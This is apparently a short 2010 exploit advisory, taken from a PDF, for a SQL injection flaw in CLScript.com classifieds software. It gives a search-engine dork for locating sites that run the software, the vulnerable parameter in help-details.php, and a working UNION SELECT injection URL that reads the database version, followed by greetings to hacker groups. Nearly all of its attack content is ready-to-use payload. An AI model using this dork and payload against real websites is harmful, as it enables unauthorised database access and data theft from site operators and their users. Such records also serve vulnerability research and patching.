CLScript.com Classifieds Software SQL Injection Vunerability.pdf

1 # Exploit Title: CLScript.com Classifieds Software SQL Injection 2 Vunerability 3 # Date: 27−4−2010 4 # Author: 41.w4r10r 5 # Vendor Link : http://www.clscript.com/ 6 # Version: Web Application 7 # Tested on: Apcahe/Unix 8 # CVE : [if exists] 9 # Dork : intext:"Powered by CLscript.com" 10 # Code : 11 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 12 ############################################################################ 13 #Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber 14 Warriors] 15 #Thanks: 16 SaiSatish,FB1H2S,Godwin_Austin,Micr0,Mannu,Harin,Jappy,Dark_Blue,Hoodlum 17 #Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d 18 #Catch us at www.andhrahackers.com or www.teamicw.in 19 ############################################################################ 20 21 22 23 Exploited Link : 24 25 1) http://example.com/help−details.php?hpId=−38’ 26 27 28 29 Live Demo : 30 31 1) 32 http://example.com/help−details.php?hpId=−38+union+select+all+1,version(),3,4,5,6,7−− 33 34 35 36 37 #41.w4r10r mailto:41.w4r10r@andhrahackers.com Page 1/1 CLScript.com Classifieds Software SQL Injection Vunerability 41.w4r10 04/27/2010